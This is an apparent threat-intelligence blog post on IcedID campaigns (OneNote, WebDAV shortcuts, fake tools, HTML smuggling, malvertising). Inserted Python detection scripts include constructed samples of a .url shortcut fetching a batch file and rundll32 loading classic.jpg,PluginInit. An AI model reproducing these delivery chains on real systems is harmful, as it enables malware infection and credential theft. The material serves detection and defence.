
The many faces of the IcedID attack kill chain

Menlo Labs | March 25, 2023

Executive Summary

The Menlo Labs Team noticed some very interesting and seemingly overlapping IcedID campaigns over the past couple of months. IcedID is a modular trojan that first appeared in 2017, and since then it has proven itself to be one of the most notorious pieces of malware. In this blog we will briefly touch on the different IcedID campaigns we have been tracking, including:

  • Malicious OneNote campaign
  • .url files using the WebDAV protocol campaign
  • Thumbcache viewer campaign
  • HTML smuggling campaigns

Threat intelligence

The attack chain of the IcedID malware is a multi-stage process that begins with malicious actors sending out phishing emails, fake Zoom installers, malicious .one files, or malvertising campaigns. The emails often contain links or attachments that lead to websites hosting malicious payloads, such as OneNote files, JavaScript files, Visual Basic Script (VBS) files, and executables (EXEs). Once the victim opens them, these files download additional components from command-and-control (C2) servers controlled by the attackers.

In addition, at the end of December 2022, this malware was found leveraging Google pay-per-click ads in malvertising attacks – an online advertising practice in which bad actors use deceptive or malicious advertisements to spread malware. Threat actors use these ads to lead victims to domains hosting the scripts used for infection, leveraging compromised WordPress sites as part of a redirector chain. The chain steers users towards the attackers’ intended destination while avoiding detection along the way.

comparison screenshots of real and malicious microsoft teams sites
Which Microsoft Teams page is real?
screenshot of malicious microsoft teams download site
A malicious Microsoft Teams download site.

We observed the attackers leveraging Search Engine Optimization (SEO) poisoning – a type of cyberattack that attempts to exploit SEO algorithms for malicious purposes – to promote compromised sites. It involves manipulating website content and code in order to raise the site’s ranking on search engine results pages (SERPs). By leveraging SEO techniques, attackers can make their malicious sites appear more legitimate and desirable than they actually are, thereby steering unsuspecting users towards them – a technique we’ve termed Legacy URL Reputation Evasive (LURE). This technique can evade detection through a combination of technical and social engineering tactics, making it a challenging threat to identify and mitigate – which is why we categorize it as a Highly Evasive Adaptive Threat (HEAT). Menlo Labs has previously detailed an attack using SEO poisoning.

Malvertising is an online advertising practice in which bad actors use deceptive or malicious advertisements to spread malware. This can happen through display ads, pop-ups, banners, or links embedded within websites or emails, each of which can lead the user to download a malicious payload such as ransomware or spyware. Malvertising campaigns typically target corporate populations; however, anyone who visits an infected site can be at risk, regardless of age or experience level.

OneNote Threat Campaign

Also seen in December 2022, IcedID used OneNote as an attack vector by exploiting its file-sharing capabilities. The threat actors uploaded malicious files such as scripts, EXEs and documents into OneNote pages, which can then be shared with potential victims. If a victim opens the file and selects the clickable icon, they unknowingly trigger the download of these malicious files and unwittingly install IcedID onto their system. This kind of attack allows attackers to bypass traditional security measures, since OneNote is generally deemed safe by antivirus software vendors.

diagram of attack

Webdav protocol campaign

The OneNote campaign continued into February 2023, when we saw another IcedID campaign start. This one used .url files that retrieved a .bat file from an open-directory WebDAV file server. Both the .url and .bat files leverage Web Distributed Authoring and Versioning (WebDAV) to fetch and execute the malware. WebDAV is a set of HTTP protocol extensions that enable users to access and modify files stored on a remote web server.
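As an added illustration (not tooling from the original post), the following Python triage script checks a .url shortcut for the WebDAV delivery pattern described above: a target that Windows fetches through its WebDAV redirector and that ends in a script or executable extension. The sample shortcut contents are constructed and use a documentation IP address.

```python
import re
from configparser import ConfigParser
from urllib.parse import urlparse

# Constructed sample .url files (not taken from the original post). "invoice.url"
# mimics the campaign pattern: a shortcut whose target is a batch file on a WebDAV
# share; 203.0.113.10 is a documentation address, not a real indicator.
SAMPLE_URL_FILES = {
    "invoice.url": (
        "[InternetShortcut]\r\n"
        "URL=file://203.0.113.10@80/DavWWWRoot/share/run.bat\r\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
        "IconIndex=13\r\n"
    ),
    "benign.url": "[InternetShortcut]\r\nURL=https://www.example.org/\r\n",
}

# host@port or DavWWWRoot in a path is the syntax the Windows WebDAV redirector accepts
WEBDAV_MARKERS = re.compile(r"@(80|443|ssl)[/\\]|DavWWWRoot", re.IGNORECASE)
EXEC_EXTENSIONS = (".bat", ".cmd", ".exe", ".dll", ".hta", ".js", ".vbs", ".lnk", ".iso")

def triage_url_file(text):
    """Return a list of findings for the contents of one .url file (empty = nothing notable)."""
    parser = ConfigParser(interpolation=None)
    parser.read_string(text)
    if "InternetShortcut" not in parser:
        return ["no [InternetShortcut] section"]
    target = parser["InternetShortcut"].get("URL", "")  # option names are case-insensitive
    findings = []
    scheme = urlparse(target).scheme.lower()
    # file:// and UNC targets make Windows fetch the resource through the WebDAV mini-redirector
    if scheme == "file" or target.startswith("\\\\"):
        findings.append("target is a file/UNC path fetched via the WebDAV redirector")
    if WEBDAV_MARKERS.search(target):
        findings.append("WebDAV host syntax in target (host@port or DavWWWRoot)")
    if target.lower().endswith(EXEC_EXTENSIONS):
        findings.append("target is a script/executable: " + target.rsplit(".", 1)[-1].lower())
    return findings

def triage_all(files):
    """Map file name -> findings for every .url file in the dict."""
    return {name: triage_url_file(text) for name, text in files.items()}
```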

Thumbcache viewer campaign

In March 2023, we saw some samples disguised as “Thumbcache Viewer”, a tool that extracts thumbnail images from the thumbcache_*.db and iconcache_*.db database files found on Windows.

screenshot showing user account control dialog box for Thumbcache Viewer
Sandbox picture of the malware being opened

HTML smuggling campaigns

Prior to this, IcedID had been seen using HTML smuggling. In October 2022, IcedID was being delivered via phishing emails with an HTML attachment. When users open the attachment and click on the decoy, they download a password-protected ZIP file that contains a malicious ISO file.

Some unconfirmed reports stated that IcedID is being used exclusively by the Quantum Ransomware gang; however, these recent infection chains have yet to reveal the end goal. Quantum Ransomware (which is made up of ex-Conti members) has been rebranded over the years, starting out as MountLocker in June 2020, then being renamed AstroLocker and XingLocker before finally becoming Quantum. Knowing this, we can look at some past campaigns that involved IcedID, such as:

  • Quantum Ransomware - April 25, 2022 ISO/LNK campaign
  • Conti Ransomware - December 2021 Stolen Images Campaign Ends in Conti Ransomware
  • XingLocker Ransomware - October 18, 2021 IcedID to XingLocker Ransomware in 24 hours

Infection Vector/Technical Details

Once IcedID is loaded onto the victim’s system, it establishes persistence through registry manipulation techniques. It modifies browser settings to inject malicious content into legitimate web pages viewed by the victim, which leads to further infection. It also injects scripts into existing processes so that it can communicate with its C2 server without being detected. Finally, it can download other payloads such as ransomware, or steal sensitive information like passwords from infected machines.

IcedID also has the ability to harvest stored credentials from web browsers, such as Chrome or Firefox, and use them for further attacks against other systems on the same network. It can also take screenshots of user activity and record keystrokes for potential password theft. The malware also attempts to disable security products, like anti-virus software or firewalls, so that it can remain undetected by IT teams who are attempting to combat its infections.

In a recent incident, the IcedID WebDAV file server mentioned above was left open, so the malicious files staged for the attack could be viewed and retrieved. The threat actors use malicious Office documents containing links to URLs hosted on their own infrastructure, which then download secondary malware onto the victim's machine.

screenshot of /webdav index
IcedID fileserver was left open at time of analysis

Also interesting in the OneNote IcedID campaign mentioned above is that malicious code is hidden in the OneNote file. That code attempts to download an executable file (putty.exe) from an external source and execute it on the victim's computer (analyst comment: the sample reviewed errored out because the location it is saved to is overwritten later in the code). It also attempts to hide its activity by resizing the window, moving it out of view, and closing it after 15 seconds.

Further down in the OneNote file is more code that attempts to download two files (classic.jpg and invoice.pdf) from a remote location and then execute them using PowerShell, bypassing certain security protocols on the user's computer. The createExecution function executes "rundll32" with "C:\Users\Public\classic.jpg,PluginInit" as an argument. It also sets up an alert() function that is triggered when clicking on the "t" link, and it resizes and moves the window it has been loaded in after loading the image whose alt tag contains a PowerShell command. Finally, it automatically clicks on the "K" link 45 seconds after loading, likely to close itself afterwards so as not to leave any trace of having been executed.

classic.jpg is a malicious executable and invoice.pdf is a decoy file intended to make the user think they downloaded a normal file.
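The chain described above (OneNote content launching an .hta, which in turn runs rundll32 on classic.jpg with the PluginInit export) leaves clear traces in process-creation telemetry. The following Python detection logic is an added example, not Menlo's or the malware's code; the Sysmon-style event records are constructed, reusing the command line and .hta path reported on this page.

```python
import re

# Constructed Sysmon-style process-creation records (not from the original post), modelled
# on the chain described above: OneNote -> mshta (.hta) -> rundll32 classic.jpg,PluginInit.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\Admin\Desktop\htaLdr\cloudDocument.hta"'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\Users\Public\classic.jpg,PluginInit"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign control-panel launch for contrast
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

OFFICE_PARENTS = ("onenote.exe", "winword.exe", "excel.exe", "outlook.exe")
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(desktop|downloads|appdata|public)\\", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rundll32_module(cmdline):
    """Return (module_path, export) for a rundll32 command line, else None.
    Quotes are stripped first; module paths containing spaces are not handled."""
    parts = cmdline.replace('"', "").split(None, 1)
    if len(parts) < 2 or not basename(parts[0]).startswith("rundll32"):
        return None
    module_and_export = parts[1].split()[0]
    if "," not in module_and_export:
        return None
    return tuple(module_and_export.split(",", 1))

def detect(event):
    """Return the list of suspicious traits seen in one process-creation event."""
    parent, image, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"{parent} spawned {image}")
    if image == "mshta.exe" and USER_WRITABLE.search(cmd):
        findings.append("mshta running an .hta from a user-writable path")
    loaded = rundll32_module(cmd)
    if loaded and not loaded[0].lower().endswith(".dll"):
        findings.append(f"rundll32 loading non-DLL file {basename(loaded[0])} via export {loaded[1]}")
    if loaded and loaded[1] == "PluginInit":
        findings.append("PluginInit export, as called by the OneNote campaign's createExecution")
    return findings
```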

onenote metadata showing malicious code
OneNote meta data showing malicious code

Also interesting is some metadata left in the malicious files, such as:

  • Some distinct markers for its campaigns:
    • unpaid_(numbers)-(Month)-03.one
  • File paths:
    • C:\Users\Admin\Desktop\htaLdr\cloudDocument.hta
    • C:\Users\Admin\Desktop\htaRevenge\lookAtThat.hta

Conclusion

Overall, IcedID uses various techniques, ranging from targeting specific organizations to using advanced evasion techniques, in order to gain access to systems undetected. This allows it to carry out nefarious activities before any security measures can intervene, making it one of the most dangerous threats currently active today.


IOCS


Sources

https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html
https://www.cyber.nj.gov/alerts-advisories/new-icedid-campaign-distributes-malware-through-fake-zoom-installer
https://socprime.com/blog/icedid-botnet-detection-malvertising-attacks-abusing-google-pay-per-click-ppc-ads/
https://thedfirreport.com/category/icedid/
https://digitalguardian.com/blog/5-malware-families-use-malvertising
